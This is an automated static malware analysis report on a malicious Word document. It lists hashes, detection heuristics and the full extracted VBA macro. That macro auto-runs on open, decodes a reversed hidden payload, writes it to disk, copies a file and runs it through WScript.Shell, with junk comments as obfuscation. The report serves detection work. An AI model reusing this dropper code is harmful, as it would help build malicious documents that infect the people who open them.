Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 18581885166355d3…

MALICIOUS

Office (OOXML)

96.5 KB Created: 2021-02-01 11:22:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 8dfadc004e37fd42781577829adff990 SHA-1: a84a98acf643b799b6afc58cdfde884a48a005bb SHA-256: 18581885166355d3a011144b5a5a7b47d4409095d1e288a97fcffc0c650cf055
230 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim aVBQ0O As New Shell32.Shell
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    avVfeb = CreateObject("wscript.shell").exec(awEi7Y)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set FSO = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6494 bytes
SHA-256: 583a64371cdf435f297f2e033cf683a71f777e291e5dd947658d5524959ecf41
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{F4BD0919-8A93-413A-9BF3-D7518EE3DBFC}{ABC133F5-AC67-4D71-8DA1-43406297437C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "aubIKi"
Sub AutoOpen()
' Disjointed leave-taking sex brokers
' Intelligence friends unfaithful
' Tocsin tours substantially
' Sixty-two laptops infra baking suspended tenable
' Orlando fig consistent
' Enrich princess importune synthesis savage correlated baseball
' Dorado awareness
' Pasha ex- infraction careful bunch crosswise
Call aU2li8
End Sub
Function aqMXZ9(aUokPm)
' Equation andreas disprove wren notebook
' Situated namesake
For asi4M = Len(aUokPm) To 1 Step -1
axuzA = Mid(aUokPm, asi4M, 1)
any2A = any2A & axuzA
Next asi4M
aqMXZ9 = any2A
End Function
Sub aU2li8()
Call aMAU2k
End Sub
Sub aMAU2k()
Call ay8fB
End Sub
Sub ay8fB()
Call aIjs7
End Sub
Sub aIjs7()
Call a5sJR
End Sub
Sub a5sJR()
Call a7SUG
End Sub

Attribute VB_Name = "asfAc"

Attribute VB_Name = "aOku0K"
Sub a9gSt(aEGpS, aVQeOL)
' Incipient any waif employee orally season develops
' Richardson
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile aEGpS, aVQeOL, 1
End Sub
Sub ahH7d(amfq7u, aZg4l)
' Variant
' Veterans vanguard without
' Roles schoolgirl year hobby breach
' Thirty-three
' Tawny biological coast alf distributors overnight
' Multimedia leslie bound
' Eau reports delusive sullied devil esperanto
' Reports kijiji necessarily tawdry
' Finder catacombs unaccompanied vicarious
' Instructions avant sky
' Payable portfolio
' Mom
' English sys debug
' Stress chef cranium deprecate
' Pease differentiate firemen urgency checkout
' Reset
' Concave buoyancy drier
' Translate icelandic horny
' Discounted brass xl rebecca
' Economy pas kindergarten lice referring
' Broomstick evasively liverpool wonderful
' Glen
' Kinase scorching partnerships blurred
' Sinewy embryo glinting jestingly
Open amfq7u For Output As #1
Print #1, aZg4l
' Indicated firstborn
' Monogram vaccine bride liabilities dissertation chary
Close #1
End Sub
Function acj8Um(amY5t)
' Morocco interlocutor gross
' Miserly undaunted bid airlines logo dean
' Examiner condo sedimentary enjoy
' Florists performs
' Perspectives births mask undignified launch fa
' Queenly abridgment number modulation
' Soot true central costume thimble devolve
End Function
Function aoKG6(aoKY0v)
' Epidemic deprecation rose impiety
' Chubby lenders replica
' Ahmed scorching spelt skirted anger
' Thoughts
' Credibility decorative filter
' Overhaul hopkins
' Unable
' Canyon
' Entitle outsider credits implementing amatory
' Impeach answers resume bread together mi suse
' Ds kenny yawned
' Caps senegal tariff
' Connecting colds
' Pers dam
' Vatican his expound mesh
' Drier
' Ranks insubordination prices
amfq7u = Split(aqMXZ9(frm.paths.text), "|")
If aoKY0v = 0 Then
aoKG6 = amfq7u(0)
ElseIf aoKY0v = 1 Then
aoKG6 = amfq7u(1)
ElseIf aoKY0v = 2 Then
aoKG6 = amfq7u(2)
ElseIf aoKY0v = 3 Then
aoKG6 = amfq7u(3)
End If
End Function
Function avVfeb(awEi7Y)
On Error Resume Next
avVfeb = CreateObject("wscript.shell").exec(awEi7Y)
End Function
Sub a7SUG()
a3sXb = aoKG6(0)
aVQeOL = aoKG6(1)
aEGpS = aoKG6(2)
aHpjhu = aoKG6(3)
' Fight garnered unyielding concepts
' Cute echoing manually
' First desktop
' Navajo
' Fees extension encompass bahamas stupor
' Legitimate justice lute
' Contentious pebble
' Developers closed loquacity
' Controversy mucous
' Lunar trousseau shooting
' Awesome
' Obadiah sealing require abeyance
' Carol
' Cafe lure globe
' Onlooker substantial mom
' Poisoning wish immediate stack
' Musical stretch forceful chef gauzy
' Fur ms ailment
' Style zigzag certificates
' Concentrate voluminous prow psychic
' Returned
' Easterly processes troubleshooting
' Worried presents activities subversive
' Leaven chassis gaming
' Accustom drought diploma
' Uniprotkb lassie issued annexation
' Invective claim vesta ax
' Odyssey screening modems
' Opened fetching cumbrous although
' Counseling tables seducer
aZg4l = aqMXZ9(frm.payload.text)
' Plume particles glacier swans
' Antipodes prodigal
ahH7d a3sXb, aZg4l
' Uninteresting sealed morocco
' Maniac stretcher diana
' Last wagner
' Ranger adverbs tyson origins dutchman
' Defendant
' Damper manufacture undergrowth
' Batman bradley
a9gSt aEGpS, aVQeOL
' Realm insulated
' Artery senior
' Ai eric
' Fullness
' Longer bb
' Inappropriate routing mortality prison solve
' Lender
' Agenda despotic
' Insulation scott pdt
' Saturnine helping world-wide christina caribbean
' Logos undefined
' Almoner monty madcap social crayon
' Names gloves
' Geek burgomaster z
' Pads
' Confluence vega
' Est accomplishing humanities
' Vanguard scholarships montgomery somalia denial
' Buffet thank
' Platforms regime hereby
' Bethany ostensibly windows
' Unwell leaving expansys
' Classification minuet satirical mail abased
Dim aVBQ0O As New Shell32.Shell
' Aspects sty complexity cowboy
' Boasting graceless vernon
' Whaler sam sewn debater shot salvage
' Jeer bengali eulogy instructors jo.
' Canned bromide economy artificer
Application.Run "avVfeb", aVQeOL & " " & aHpjhu & "mat : """ & a3sXb & """"
' Tatters waterfall tiller dukedom thus
' Neuralgia threat
' Packing disruption vaunted certainly
' Aggrieved crux apache
' Concentrate installing misgivings wr carolina
' Prep quota damps gun simulations
' Trading der
' Constraint loop relationships steppe
' Taxi garden argo intonation incidental
' Forever aging
' Pockets vocal
' Focused
' Quell stop hentai sporadic
' Antarctica
' Ibm powerseller portuguese
' Unscathed probation hellenic treasure
' Avg integration ian venerated ba general
' Propagating functioning paddy
' Obligatory macromedia clearing ichabod
' Assistance bk council waning
' Mixed astral eulogium
' Motherhood pos permanent
' Bathroom prescience subsidiaries
' Kerry game amount alexander
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 36352 bytes
SHA-256: 01af2af20dd00245a9f04700bccbc910c32e89f348ac986b44cf0c58e9306c38